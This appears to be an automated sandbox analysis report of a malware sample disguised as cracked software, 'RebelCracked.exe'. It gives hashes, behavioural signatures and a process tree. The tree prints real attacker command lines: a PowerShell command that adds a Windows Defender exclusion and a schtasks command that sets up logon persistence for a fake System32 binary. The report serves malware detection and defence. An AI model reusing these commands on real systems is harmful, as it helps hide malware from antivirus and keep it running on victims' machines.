Analysis
-
max time kernel
1202s -
max time network
1804s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
28/08/2024, 18:50
Static task
static1
Behavioral task
behavioral1
Sample
RebelCracked.exe
Resource
win11-20240802-en
General
-
Target
RebelCracked.exe
-
Size
59.1MB
-
MD5
de03a6ac4fa6802caa50fd073b7be449
-
SHA1
ac9667427372479575e1eafe18e5a7cde34cdfcc
-
SHA256
4616bbe467cc30996c3ea49a15aa171f5638b37d908f1476898af213f4147477
-
SHA512
6f6a9a82a2639ff8b6773481eef48836c7c2e9a2177f90964340d3238e467dfe53e2b2e6909427fb06f0e1440d955dc6968b38047a09a23441360ecc3f63cf8e
-
SSDEEP
1572864:rSm+3uqEX+P9rhdiKsD3nkQC3eFS8z1wvNCwp860CvLc:+m+3uqy+lDqY34S8zmVPtHLc
Malware Config
Signatures
-
Renames multiple (160) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 31 IoCs
flow pid Process 9 1816 Runtime Broker.exe 29 5228 Runtime Broker.exe 31 856 Runtime Broker.exe 43 5228 Runtime Broker.exe 46 7000 Runtime Broker.exe 49 1940 Runtime Broker.exe 71 2648 Runtime Broker.exe 88 796 Runtime Broker.exe 98 5996 Runtime Broker.exe 101 4044 Runtime Broker.exe 107 5680 Runtime Broker.exe 118 6612 Runtime Broker.exe 128 5680 Runtime Broker.exe 130 988 Runtime Broker.exe 133 4964 Runtime Broker.exe 142 1428 Runtime Broker.exe 153 2440 Runtime Broker.exe 155 7100 Runtime Broker.exe 159 988 Runtime Broker.exe 171 3324 Process not Found 176 4856 Process not Found 180 1492 Process not Found 187 752 Process not Found 192 5060 Process not Found 196 1476 Process not Found 210 1876 Process not Found 221 1400 Process not Found 223 6780 Process not Found 227 4528 Process not Found 230 1492 Process not Found 235 6716 Process not Found -
Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 7056 Process not Found 2140 powershell.exe 2920 powershell.exe 5496 Process not Found 3592 Process not Found 5124 Process not Found 2920 powershell.exe 1984 powershell.exe 3732 powershell.exe 6408 Process not Found 4800 Process not Found 5616 Process not Found 3644 Process not Found 5328 powershell.exe 1376 powershell.exe 2420 Process not Found 3688 Process not Found 7100 Process not Found 7108 Process not Found 5508 Process not Found 6324 powershell.exe 4276 powershell.exe 1556 powershell.exe 5944 Process not Found 5992 Process not Found 4272 powershell.exe 5912 powershell.exe 6308 powershell.exe 2544 Process not Found 760 powershell.exe 4768 Process not Found 5656 Process not Found 3212 Process not Found 1448 Process not Found 5256 powershell.exe 1384 powershell.exe 3068 powershell.exe 4108 powershell.exe 5888 powershell.exe 3948 Process not Found 3588 Process not Found 2024 Process not Found 4764 Process not Found 5464 Process not Found 5464 powershell.exe 4916 powershell.exe 3076 Process not Found 3768 Process not Found 2404 Process not Found 6168 powershell.exe 2700 powershell.exe 1544 Process not Found 7040 Process not Found 4512 powershell.exe 6264 Process not Found 848 Process not Found 1388 Process not Found 6268 Process not Found 3768 Process not Found 2116 Process not Found 5516 Process not Found 5508 Process not Found 7072 powershell.exe 760 Process not Found -
Executes dropped EXE 64 IoCs
pid Process 1716 Runtime Broker.exe 1836 Runtime Broker.exe 3644 Runtime Broker.exe 800 Runtime Broker.exe 2796 Runtime Broker.exe 1988 Runtime Broker.exe 2452 Runtime Broker.exe 3688 Runtime Broker.exe 5344 Runtime Broker.exe 2664 Runtime Broker.exe 5580 Runtime Broker.exe 4724 Runtime Broker.exe 6424 Runtime Broker.exe 3412 Runtime Broker.exe 4692 Runtime Broker.exe 1816 Runtime Broker.exe 5572 Runtime Broker.exe 5364 Runtime Broker.exe 6712 Runtime Broker.exe 1128 Runtime Broker.exe 912 Runtime Broker.exe 1824 Runtime Broker.exe 6200 Runtime Broker.exe 5808 Runtime Broker.exe 6904 Runtime Broker.exe 5820 Runtime Broker.exe 5592 Runtime Broker.exe 7076 Runtime Broker.exe 6368 Runtime Broker.exe 5956 Runtime Broker.exe 6028 Runtime Broker.exe 3928 Runtime Broker.exe 5676 Runtime Broker.exe 4088 Runtime Broker.exe 6148 Runtime Broker.exe 6884 Runtime Broker.exe 5884 Runtime Broker.exe 3432 Runtime Broker.exe 6468 Runtime Broker.exe 1368 Runtime Broker.exe 5416 Runtime Broker.exe 4292 Runtime Broker.exe 4804 Runtime Broker.exe 6232 Runtime Broker.exe 1688 Runtime Broker.exe 4944 Runtime Broker.exe 5796 Runtime Broker.exe 7028 Runtime Broker.exe 6944 Runtime Broker.exe 5176 Runtime Broker.exe 2156 Runtime Broker.exe 1440 Runtime Broker.exe 4996 Runtime Broker.exe 5228 Runtime Broker.exe 5540 Runtime Broker.exe 6388 Runtime Broker.exe 6672 Runtime Broker.exe 856 Runtime Broker.exe 6416 Runtime Broker.exe 5224 Runtime Broker.exe 5472 Runtime Broker.exe 4472 Runtime Broker.exe 6956 Runtime Broker.exe 4360 Runtime Broker.exe -
Loads dropped DLL 64 IoCs
pid Process 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 800 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe -
resource yara_rule behavioral1/files/0x000100000002ade1-818.dat upx behavioral1/memory/1836-820-0x00007FFBD7820000-0x00007FFBD7E09000-memory.dmp upx behavioral1/memory/1836-829-0x00007FFBEF910000-0x00007FFBEF933000-memory.dmp upx behavioral1/files/0x000100000002aa1a-830.dat upx behavioral1/memory/1836-835-0x00007FFBF1220000-0x00007FFBF1239000-memory.dmp upx behavioral1/memory/1836-834-0x00007FFBF5FC0000-0x00007FFBF5FCF000-memory.dmp upx behavioral1/memory/1836-879-0x00007FFBEC8B0000-0x00007FFBEC8DD000-memory.dmp upx behavioral1/memory/1836-880-0x00007FFBEB920000-0x00007FFBEB956000-memory.dmp upx behavioral1/memory/1836-884-0x00007FFBEC5C0000-0x00007FFBEC5EE000-memory.dmp upx behavioral1/memory/1836-883-0x00007FFBF5D80000-0x00007FFBF5D8D000-memory.dmp upx behavioral1/memory/1836-882-0x00007FFBF5DC0000-0x00007FFBF5DCD000-memory.dmp upx behavioral1/memory/1836-881-0x00007FFBECB80000-0x00007FFBECB99000-memory.dmp upx behavioral1/files/0x000100000002aa1b-878.dat upx behavioral1/memory/1836-886-0x00007FFBEB610000-0x00007FFBEB63B000-memory.dmp upx behavioral1/memory/1836-885-0x00007FFBE0A70000-0x00007FFBE0B2C000-memory.dmp upx behavioral1/files/0x000100000002aa19-877.dat upx behavioral1/files/0x000100000002a9bf-833.dat upx behavioral1/files/0x000100000002a9ba-832.dat upx behavioral1/files/0x000100000002a9bc-827.dat upx behavioral1/memory/1836-887-0x00007FFBD7820000-0x00007FFBD7E09000-memory.dmp upx behavioral1/memory/1836-888-0x00007FFBD7700000-0x00007FFBD781C000-memory.dmp upx behavioral1/memory/1836-899-0x00007FFBEF910000-0x00007FFBEF933000-memory.dmp upx behavioral1/memory/800-1677-0x00007FFBD7010000-0x00007FFBD75F9000-memory.dmp upx behavioral1/memory/800-1679-0x00007FFBEC770000-0x00007FFBEC77F000-memory.dmp upx behavioral1/memory/800-1682-0x00007FFBE0BA0000-0x00007FFBE0BCD000-memory.dmp upx behavioral1/memory/1836-1684-0x00007FFBE0A70000-0x00007FFBE0B2C000-memory.dmp upx behavioral1/memory/800-1683-0x00007FFBDB330000-0x00007FFBDB366000-memory.dmp upx behavioral1/memory/800-1681-0x00007FFBE1D80000-0x00007FFBE1D99000-memory.dmp upx behavioral1/memory/800-1678-0x00007FFBE1DA0000-0x00007FFBE1DC3000-memory.dmp upx behavioral1/memory/1836-1680-0x00007FFBEC5C0000-0x00007FFBEC5EE000-memory.dmp upx behavioral1/memory/800-1688-0x00007FFBD6FC0000-0x00007FFBD6FEE000-memory.dmp upx behavioral1/memory/800-1690-0x00007FFBD6F00000-0x00007FFBD6FBC000-memory.dmp upx behavioral1/memory/800-1691-0x00007FFBD6ED0000-0x00007FFBD6EFB000-memory.dmp upx behavioral1/memory/1836-1689-0x00007FFBD7700000-0x00007FFBD781C000-memory.dmp upx behavioral1/memory/800-1687-0x00007FFBEB910000-0x00007FFBEB91D000-memory.dmp upx behavioral1/memory/800-1686-0x00007FFBEC580000-0x00007FFBEC58D000-memory.dmp upx behavioral1/memory/800-1685-0x00007FFBD6FF0000-0x00007FFBD7009000-memory.dmp upx behavioral1/memory/800-1692-0x00007FFBD6DB0000-0x00007FFBD6ECC000-memory.dmp upx behavioral1/memory/800-1693-0x00007FFBD7010000-0x00007FFBD75F9000-memory.dmp upx behavioral1/memory/1836-1702-0x00007FFBD4820000-0x00007FFBD4853000-memory.dmp upx behavioral1/memory/1836-1704-0x00007FFBD4750000-0x00007FFBD481D000-memory.dmp upx behavioral1/memory/1836-1705-0x00007FFBD26C0000-0x00007FFBD2BE2000-memory.dmp upx behavioral1/memory/800-1703-0x00007FFBDB330000-0x00007FFBDB366000-memory.dmp upx behavioral1/memory/1836-1711-0x00007FFBD4670000-0x00007FFBD4696000-memory.dmp upx behavioral1/memory/1836-1710-0x00007FFBE0B90000-0x00007FFBE0B9B000-memory.dmp upx behavioral1/memory/1836-1709-0x00007FFBD46A0000-0x00007FFBD46B4000-memory.dmp upx behavioral1/memory/1836-1708-0x00007FFBD46C0000-0x00007FFBD4747000-memory.dmp upx behavioral1/memory/800-1707-0x00007FFBD6FC0000-0x00007FFBD6FEE000-memory.dmp upx behavioral1/memory/1836-1713-0x00007FFBD4640000-0x00007FFBD4658000-memory.dmp upx behavioral1/memory/800-1712-0x00007FFBD6F00000-0x00007FFBD6FBC000-memory.dmp upx behavioral1/memory/1836-1715-0x00007FFBD4160000-0x00007FFBD42D7000-memory.dmp upx behavioral1/memory/1836-1714-0x00007FFBD4610000-0x00007FFBD4633000-memory.dmp upx behavioral1/memory/1836-1721-0x00007FFBD39A0000-0x00007FFBD39AB000-memory.dmp upx behavioral1/memory/1836-1722-0x00007FFBD4750000-0x00007FFBD481D000-memory.dmp upx behavioral1/memory/1836-1720-0x00007FFBD4820000-0x00007FFBD4853000-memory.dmp upx behavioral1/memory/1836-1719-0x00007FFBD40F0000-0x00007FFBD40FC000-memory.dmp upx behavioral1/memory/1836-1718-0x00007FFBD4100000-0x00007FFBD410B000-memory.dmp upx behavioral1/memory/1836-1717-0x00007FFBD4110000-0x00007FFBD411B000-memory.dmp upx behavioral1/memory/1836-1716-0x00007FFBD4120000-0x00007FFBD4156000-memory.dmp upx behavioral1/memory/1836-1727-0x00007FFBD3970000-0x00007FFBD397C000-memory.dmp upx behavioral1/memory/1836-1740-0x00007FFBD08A0000-0x00007FFBD0CC2000-memory.dmp upx behavioral1/memory/1836-1739-0x00007FFBD33C0000-0x00007FFBD33DC000-memory.dmp upx behavioral1/memory/1836-1738-0x00007FFBD3860000-0x00007FFBD386B000-memory.dmp upx behavioral1/memory/1836-1741-0x00007FFBCF4F0000-0x00007FFBD0897000-memory.dmp upx -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe Process not Found File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe File created C:\Windows\System32\Runtime Broker.exe RebelCracked.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 29 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 452 Process not Found 2940 Process not Found 1460 WMIC.exe 3688 Process not Found 3212 Process not Found 6808 Process not Found 5916 WMIC.exe 3732 WMIC.exe 1156 Process not Found 860 Process not Found 5904 WMIC.exe 4800 Process not Found 5800 Process not Found 1940 Process not Found 5952 Process not Found 4932 WMIC.exe 1036 WMIC.exe 3628 WMIC.exe 6780 WMIC.exe 4780 WMIC.exe 2956 Process not Found 2420 Process not Found 1308 WMIC.exe 5616 WMIC.exe 912 WMIC.exe 1156 Process not Found 2756 Process not Found 3004 Process not Found 6580 WMIC.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1796 schtasks.exe 5892 schtasks.exe 1172 Process not Found 5124 Process not Found 5708 Process not Found 3928 schtasks.exe 2092 schtasks.exe 4000 Process not Found 5940 Process not Found 416 Process not Found 4744 Process not Found 852 Process not Found 3408 schtasks.exe 2552 schtasks.exe 860 schtasks.exe 6056 Process not Found 1584 Process not Found 7120 Process not Found 5404 schtasks.exe 6400 schtasks.exe 4332 schtasks.exe 6808 Process not Found 2732 Process not Found 7092 Process not Found 2008 schtasks.exe 332 Process not Found 6924 Process not Found 2440 Process not Found 2860 schtasks.exe 6340 schtasks.exe 6220 schtasks.exe 4944 schtasks.exe 3464 Process not Found 5352 Process not Found 7144 schtasks.exe 5684 schtasks.exe 920 Process not Found 6132 Process not Found 6720 schtasks.exe 2960 Process not Found 5264 Process not Found 6864 Process not Found 3292 Process not Found 5928 Process not Found 6432 Process not Found 5432 Process not Found 6792 Process not Found 5496 Process not Found 6324 Process not Found 6836 schtasks.exe 916 schtasks.exe 3764 schtasks.exe 4360 Process not Found 6644 schtasks.exe 3184 schtasks.exe 4328 schtasks.exe 6140 Process not Found 4332 Process not Found 6196 schtasks.exe 6780 schtasks.exe 2212 schtasks.exe 4416 Process not Found 5412 Process not Found 5692 Process not Found -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3872 powershell.exe 3872 powershell.exe 1436 powershell.exe 1436 powershell.exe 2588 powershell.exe 2588 powershell.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 1836 Runtime Broker.exe 4512 powershell.exe 4512 powershell.exe 1128 powershell.exe 1128 powershell.exe 4780 powershell.exe 4780 powershell.exe 2900 powershell.exe 2900 powershell.exe 6168 powershell.exe 6168 powershell.exe 4320 powershell.exe 4320 powershell.exe 432 powershell.exe 432 powershell.exe 6568 powershell.exe 6568 powershell.exe 1260 powershell.exe 1260 powershell.exe 2732 powershell.exe 2732 powershell.exe 3212 powershell.exe 3212 powershell.exe 6868 powershell.exe 5820 Runtime Broker.exe 5820 Runtime Broker.exe 5820 Runtime Broker.exe 5820 Runtime Broker.exe 6868 powershell.exe 5872 powershell.exe 5872 powershell.exe 4088 powershell.exe 4088 powershell.exe 5180 powershell.exe 5180 powershell.exe 4820 powershell.exe 4820 powershell.exe 3520 powershell.exe 3520 powershell.exe 5812 powershell.exe 5812 powershell.exe 6500 powershell.exe 6500 powershell.exe 6184 powershell.exe 6184 powershell.exe 1496 powershell.exe 1496 powershell.exe 4072 powershell.exe 4072 powershell.exe 428 powershell.exe 428 powershell.exe 5176 Runtime Broker.exe 5176 Runtime Broker.exe 5176 Runtime Broker.exe 5176 Runtime Broker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3872 powershell.exe Token: SeDebugPrivilege 1436 powershell.exe Token: SeDebugPrivilege 2588 powershell.exe Token: SeDebugPrivilege 1836 Runtime Broker.exe Token: SeIncreaseQuotaPrivilege 1128 WMIC.exe Token: SeSecurityPrivilege 1128 WMIC.exe Token: SeTakeOwnershipPrivilege 1128 WMIC.exe Token: SeLoadDriverPrivilege 1128 WMIC.exe Token: SeSystemProfilePrivilege 1128 WMIC.exe Token: SeSystemtimePrivilege 1128 WMIC.exe Token: SeProfSingleProcessPrivilege 1128 WMIC.exe Token: SeIncBasePriorityPrivilege 1128 WMIC.exe Token: SeCreatePagefilePrivilege 1128 WMIC.exe Token: SeBackupPrivilege 1128 WMIC.exe Token: SeRestorePrivilege 1128 WMIC.exe Token: SeShutdownPrivilege 1128 WMIC.exe Token: SeDebugPrivilege 1128 WMIC.exe Token: SeSystemEnvironmentPrivilege 1128 WMIC.exe Token: SeRemoteShutdownPrivilege 1128 WMIC.exe Token: SeUndockPrivilege 1128 WMIC.exe Token: SeManageVolumePrivilege 1128 WMIC.exe Token: 33 1128 WMIC.exe Token: 34 1128 WMIC.exe Token: 35 1128 WMIC.exe Token: 36 1128 WMIC.exe Token: SeIncreaseQuotaPrivilege 1128 WMIC.exe Token: SeSecurityPrivilege 1128 WMIC.exe Token: SeTakeOwnershipPrivilege 1128 WMIC.exe Token: SeLoadDriverPrivilege 1128 WMIC.exe Token: SeSystemProfilePrivilege 1128 WMIC.exe Token: SeSystemtimePrivilege 1128 WMIC.exe Token: SeProfSingleProcessPrivilege 1128 WMIC.exe Token: SeIncBasePriorityPrivilege 1128 WMIC.exe Token: SeCreatePagefilePrivilege 1128 WMIC.exe Token: SeBackupPrivilege 1128 WMIC.exe Token: SeRestorePrivilege 1128 WMIC.exe Token: SeShutdownPrivilege 1128 WMIC.exe Token: SeDebugPrivilege 1128 WMIC.exe Token: SeSystemEnvironmentPrivilege 1128 WMIC.exe Token: SeRemoteShutdownPrivilege 1128 WMIC.exe Token: SeUndockPrivilege 1128 WMIC.exe Token: SeManageVolumePrivilege 1128 WMIC.exe Token: 33 1128 WMIC.exe Token: 34 1128 WMIC.exe Token: 35 1128 WMIC.exe Token: 36 1128 WMIC.exe Token: SeDebugPrivilege 800 Runtime Broker.exe Token: SeIncreaseQuotaPrivilege 1308 WMIC.exe Token: SeSecurityPrivilege 1308 WMIC.exe Token: SeTakeOwnershipPrivilege 1308 WMIC.exe Token: SeLoadDriverPrivilege 1308 WMIC.exe Token: SeSystemProfilePrivilege 1308 WMIC.exe Token: SeSystemtimePrivilege 1308 WMIC.exe Token: SeProfSingleProcessPrivilege 1308 WMIC.exe Token: SeIncBasePriorityPrivilege 1308 WMIC.exe Token: SeCreatePagefilePrivilege 1308 WMIC.exe Token: SeBackupPrivilege 1308 WMIC.exe Token: SeRestorePrivilege 1308 WMIC.exe Token: SeShutdownPrivilege 1308 WMIC.exe Token: SeDebugPrivilege 1308 WMIC.exe Token: SeSystemEnvironmentPrivilege 1308 WMIC.exe Token: SeRemoteShutdownPrivilege 1308 WMIC.exe Token: SeUndockPrivilege 1308 WMIC.exe Token: SeManageVolumePrivilege 1308 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4620 wrote to memory of 3872 4620 RebelCracked.exe 82 PID 4620 wrote to memory of 3872 4620 RebelCracked.exe 82 PID 4620 wrote to memory of 1148 4620 RebelCracked.exe 84 PID 4620 wrote to memory of 1148 4620 RebelCracked.exe 84 PID 4620 wrote to memory of 1716 4620 RebelCracked.exe 86 PID 4620 wrote to memory of 1716 4620 RebelCracked.exe 86 PID 4620 wrote to memory of 3956 4620 RebelCracked.exe 87 PID 4620 wrote to memory of 3956 4620 RebelCracked.exe 87 PID 1716 wrote to memory of 1836 1716 Runtime Broker.exe 88 PID 1716 wrote to memory of 1836 1716 Runtime Broker.exe 88 PID 1836 wrote to memory of 4828 1836 Runtime Broker.exe 89 PID 1836 wrote to memory of 4828 1836 Runtime Broker.exe 89 PID 3956 wrote to memory of 1436 3956 RebelCracked.exe 91 PID 3956 wrote to memory of 1436 3956 RebelCracked.exe 91 PID 3956 wrote to memory of 2932 3956 RebelCracked.exe 93 PID 3956 wrote to memory of 2932 3956 RebelCracked.exe 93 PID 3956 wrote to memory of 3644 3956 RebelCracked.exe 95 PID 3956 wrote to memory of 3644 3956 RebelCracked.exe 95 PID 3956 wrote to memory of 1392 3956 RebelCracked.exe 96 PID 3956 wrote to memory of 1392 3956 RebelCracked.exe 96 PID 3644 wrote to memory of 800 3644 Runtime Broker.exe 97 PID 3644 wrote to memory of 800 3644 Runtime Broker.exe 97 PID 800 wrote to memory of 2292 800 Runtime Broker.exe 98 PID 800 wrote to memory of 2292 800 Runtime Broker.exe 98 PID 1392 wrote to memory of 2588 1392 RebelCracked.exe 100 PID 1392 wrote to memory of 2588 1392 RebelCracked.exe 100 PID 1836 wrote to memory of 1152 1836 Runtime Broker.exe 102 PID 1836 wrote to memory of 1152 1836 Runtime Broker.exe 102 PID 1392 wrote to memory of 240 1392 RebelCracked.exe 104 PID 1392 wrote to memory of 240 1392 RebelCracked.exe 104 PID 1152 wrote to memory of 1128 1152 cmd.exe 125 PID 1152 wrote to memory of 1128 1152 cmd.exe 125 PID 1392 wrote to memory of 2796 1392 RebelCracked.exe 107 PID 1392 wrote to memory of 2796 1392 RebelCracked.exe 107 PID 1392 wrote to memory of 3344 1392 RebelCracked.exe 108 PID 1392 wrote to memory of 3344 1392 RebelCracked.exe 108 PID 1836 wrote to memory of 768 1836 Runtime Broker.exe 110 PID 1836 wrote to memory of 768 1836 Runtime Broker.exe 110 PID 768 wrote to memory of 1308 768 cmd.exe 112 PID 768 wrote to memory of 1308 768 cmd.exe 112 PID 2796 wrote to memory of 1988 2796 Runtime Broker.exe 113 PID 2796 wrote to memory of 1988 2796 Runtime Broker.exe 113 PID 1988 wrote to memory of 4380 1988 Runtime Broker.exe 114 PID 1988 wrote to memory of 4380 1988 Runtime Broker.exe 114 PID 3344 wrote to memory of 4512 3344 RebelCracked.exe 116 PID 3344 wrote to memory of 4512 3344 RebelCracked.exe 116 PID 3344 wrote to memory of 1796 3344 RebelCracked.exe 118 PID 3344 wrote to memory of 1796 3344 RebelCracked.exe 118 PID 3344 wrote to memory of 2452 3344 RebelCracked.exe 120 PID 3344 wrote to memory of 2452 3344 RebelCracked.exe 120 PID 3344 wrote to memory of 5176 3344 RebelCracked.exe 121 PID 3344 wrote to memory of 5176 3344 RebelCracked.exe 121 PID 2452 wrote to memory of 3688 2452 Runtime Broker.exe 122 PID 2452 wrote to memory of 3688 2452 Runtime Broker.exe 122 PID 3688 wrote to memory of 3732 3688 Runtime Broker.exe 123 PID 3688 wrote to memory of 3732 3688 Runtime Broker.exe 123 PID 5176 wrote to memory of 1128 5176 RebelCracked.exe 177 PID 5176 wrote to memory of 1128 5176 RebelCracked.exe 177 PID 5176 wrote to memory of 3160 5176 RebelCracked.exe 127 PID 5176 wrote to memory of 3160 5176 RebelCracked.exe 127 PID 5176 wrote to memory of 5344 5176 RebelCracked.exe 129 PID 5176 wrote to memory of 5344 5176 RebelCracked.exe 129 PID 5176 wrote to memory of 5352 5176 RebelCracked.exe 130 PID 5176 wrote to memory of 5352 5176 RebelCracked.exe 130 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Runtime Broker.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Runtime Broker" /SC ONLOGON /TR "C:\Windows\System32\Runtime Broker.exe" /RL HIGHEST2⤵PID:1148
-
-
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\System32\Runtime Broker.exe"C:\Windows\System32\Runtime Broker.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"4⤵PID:4828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"C:\Users\Admin\AppData\Local\Temp\RebelCracked.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3956 -
